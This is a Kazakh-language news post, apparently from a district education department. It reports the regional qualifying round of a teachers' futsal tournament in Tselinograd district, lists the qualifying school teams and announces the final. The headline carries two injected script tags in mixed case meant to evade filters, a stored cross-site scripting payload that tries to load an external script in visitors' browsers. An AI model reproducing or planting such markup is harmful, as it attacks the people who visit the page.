Целиноград ауданы білім бөлімінің басшысы кубогі үшін, жалпы білім беретін мектеп педагогтары арасында футзалдан ІІ-ші турнир ойынының аумақтық іріктеу кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
12.03.2024
Целиноград ауданы білім бөлімі ұйымдастыруымен 2024 жылдың 11 наурыз күні Целиноград ауданы білім бөлімінің басшысы кубогі үшін, жалпы білім беретін мектеп педагогтары арасында футзалдан ІІ ші турнир ойынының аумақтық іріктеу кезеңі төрт аумақта өтті. Бірінші аумақ Ақмол ауылының БЖСМ, екінші аумақ Қызылжар ЖОББМ, үшінші аумақ Талапкер ЖОББМ, төртінші аумақ Қоянды ауылының №1 ЖОББМ өткізді. Футзал ойынына ауданның жалпы білім беретін мектептерінен 19 команда қатысты. Жарыс ережесіне сай әр аумақтан 1ші және 2ші орын алған команда ақтық сын жарысына жолдама алды. Олар:
1. Ақмол ЖОББМ; 2. Оразақ ЖОББМ;
1. Қабанбай батыр ЖОББМ; 2. Жалғызқұдық ЖОББМ;
1. Талапкер ЖОББМ; 2. Арайлы ЖОББМ;
1. Қоянды №1; 2. Қоянды №2;
Финалдық ойын ағымдағы жылдың 17 наурыз күні Ақмол ауылының БЖСМ базасында өтеді. Аумақтық іріктеу кезеңінен жеңіске жеткен командаларға финалдық ойында сәттілік тілейміз!
Әдіскер: Е. Қорғанбеков